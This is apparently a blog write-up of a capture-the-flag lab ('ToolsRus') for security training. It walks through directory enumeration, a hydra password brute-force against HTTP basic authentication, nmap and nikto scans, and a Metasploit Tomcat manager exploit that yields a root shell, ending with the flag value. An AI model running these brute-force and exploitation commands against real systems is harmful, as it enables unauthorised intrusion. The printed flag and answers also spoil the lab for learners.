ToolsRus-泓源视野

ToolsRus

[Task 1] ToysRus

  1. What directory can you find, that begins with a g?
    - Open DirBuster
    - input target url and wordlist
    - Click Start and wait
ToolsRus插图
ToolsRus插图1

open /guidelines/

http://<ip>/guidelines/
ToolsRus插图2

2. Whose name can you find from this directory? Bob

3. What directory has basic authentication? Protected

ToolsRus插图3
ToolsRus插图4

4. What is bob’s password to the protected part of the website?
I used hydra to crack the password with http-get form

hydra -l bob -P /root/Desktop/rockyou.txt -f 10.10.176.108 http-get /protected/
ToolsRus插图5

Try to login with credential

ToolsRus插图6

5. What other port that serves a webs service is open on the machine?
Find open port

nmap -Pn 10.10.176.108
ToolsRus插图7

Find services

nmap -sV -T 4 10.10.176.108
ToolsRus插图8

Tomcat port is 1234

6. Going to the service running on that port, what is the name and version of the software?

nmap -sV -A -T 4 10.10.176.108
ToolsRus插图9

Apache Tomcat/7.0.88

Also access port 1234

ToolsRus插图10

7. Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
How many documentation files did Nikto identify?

Click Manager App

ToolsRus插图11

Try with credential

ToolsRus插图12
ToolsRus插图13

Let’s scan the site

nikto -h http://10.10.131.147:1234/manager/html -id bob:<password>
ToolsRus插图14

There’re 5 documents.

10. Where is Ektron CMS version information found?
/manager/html/WorkArea/version.xml

9. What version of Apache-Coyote is this service using? 1.1

ToolsRus插图9

10. Use Metasploit to exploit the service and get a shell on the system.
What user did you get a shell as?

msfconsole
ToolsRus插图15
search tomcat

There’re 3 exploits that I can use.

ToolsRus插图16

I tried to use #13 and #14, but it didn’t work. I’ll skip to #15.

use 15
ToolsRus插图17
show options
ToolsRus插图18
set HttpPassword <password>
set HttpUsername bob
set RHOSTS <ip>
set RPORT 1234
ToolsRus插图19
run
ToolsRus插图20

Let’s get shell

shell
ToolsRus插图21
whoami
ToolsRus插图22

What user did you get a shell as? root

10. What text is in the file /root/flag.txt

cd /root
ls
cat flag.txt
ToolsRus插图23

ff1fc4a81affcc7688cf89ae7dc6e0e1

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
14

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8232431 位访客, 您的IP是:[172.70.45.159]